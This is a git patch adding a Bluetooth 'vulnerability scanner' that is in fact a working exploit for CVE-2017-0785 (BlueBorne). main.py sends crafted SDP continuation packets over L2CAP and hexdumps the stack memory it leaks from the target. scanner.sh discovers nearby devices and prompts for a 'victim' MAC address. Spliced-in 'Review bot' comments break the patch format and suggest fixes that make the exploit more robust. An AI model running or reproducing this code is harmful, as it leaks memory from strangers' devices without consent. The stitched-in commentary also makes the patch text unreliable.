From 934254059fe6e75615747bf2cfcc4f52c07441e7 Mon Sep 17 00:00:00 2001
From: Navan Chauhan
Date: Mon, 2 Oct 2017 21:10:16 +0530
Subject: Files Added

---
 README.md | 1 +
 main.py | 53 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 scanner.sh | 8 ++++++++
 3 files changed, 62 insertions(+)
 create mode 100644 README.md
 create mode 100644 main.py
 create mode 100644 scanner.sh

diff --git a/README.md b/README.md
new file mode 100644
index 0000000..9831cc3
--- /dev/null
+++ b/README.md
@@ -0,0 +1 @@
+# Blueborne-Vulnerability-Scanner
diff --git a/main.py b/main.py
new file mode 100644
index 0000000..9e861e7
--- /dev/null
+++ b/main.py
@@ -0,0 +1,53 @@
+from pwn import *
+import bluetooth
+
+if not 'TARGET' in args:
+ log.info("Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX")
+ exit()
+
+target = args['TARGET']
+service_long = 0x0100
+service_short = 0x0001
+mtu = 50
+n = 30
+
+def packet(service, continuation_state):
+ pkt = '\x02\x00\x00'
+ pkt += p16(7 + len(continuation_state))
+ pkt += '\x35\x03\x19'
+ pkt += p16(service)
+ pkt += '\x01\x00'
+ pkt += continuation_state
+ return pkt
+
+p = log.progress('Exploit')
+p.status('Creating L2CAP socket')
+
+sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
+bluetooth.set_l2cap_mtu(sock, mtu)
+context.endian = 'big'
+
+p.status('Connecting to target')
+sock.connect((target, 1))
+
+p.status('Sending packet 0')
+sock.send(packet(service_long, '\x00'))
+data = sock.recv(mtu)
+
+if data[-3] != '\x02':
+ log.error('Invalid continuation state received.')
+
+stack = ''
+
+for i in range(1, n):
+ p.status('Sending packet %d' % i)
+ sock.send(packet(service_short, data[-3:]))
+ data = sock.recv(mtu)
+ stack += data[9:-3]
+
+sock.close()
+
+p.success('Done')
+
+print hexdump(stack)
+
diff --git a/scanner.sh b/scanner.sh
new file mode 100644
index 0000000..485db04
--- /dev/null
+++ b/scanner.sh
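Review bot: `if data[-3] != '\x02':` indexes the first reply without checking its length, so an empty or short response from the peer raises IndexError instead of reaching the intended log.error, and `stack += data[9:-3]` inside the loop makes the same unchecked assumption; the guard should read `if len(data) < 3 or data[-3] != '\x02':` and the loop should skip replies too short to slice. Because pwntools' log.error raises rather than returns, and because recv() can block or raise, the `sock.close()` near the end of the file is never reached on any failure path — wrapping the exchange in try/finally would release the L2CAP socket reliably. `packet()` also has no docstring; I would add `"""Build a request whose 16-bit length field at offset 3 is p16(7 + len(continuation_state)) and whose trailing bytes are continuation_state."""` — it presumably encodes an SDP service search request, but confirm against the specification before documenting it as such.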
@@ -0,0 +1,8 @@
+#!/bin/bash
+hcitool scan
+echo "Enter The Mac Adress of the desired victim"
+read targer
+clear
+echo "Scanning"
+clear
+python main.py TARGET=$targer
-- 
cgit v1.2.3
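Review bot: `$targer` in `python main.py TARGET=$targer` is unquoted and the value typed at the prompt is never validated, so input containing spaces or glob characters undergoes word splitting and pathname expansion before main.py sees it; quote it as `python main.py TARGET="$targer"` and reject anything that is not a colon-separated MAC address before running the scanner. The second `clear`, placed right after `echo "Scanning"`, wipes that message the instant it is printed, so either drop it or print the status after it. `targer` is presumably a typo for target; it is used consistently so the script works, but renaming it would make the intent obvious.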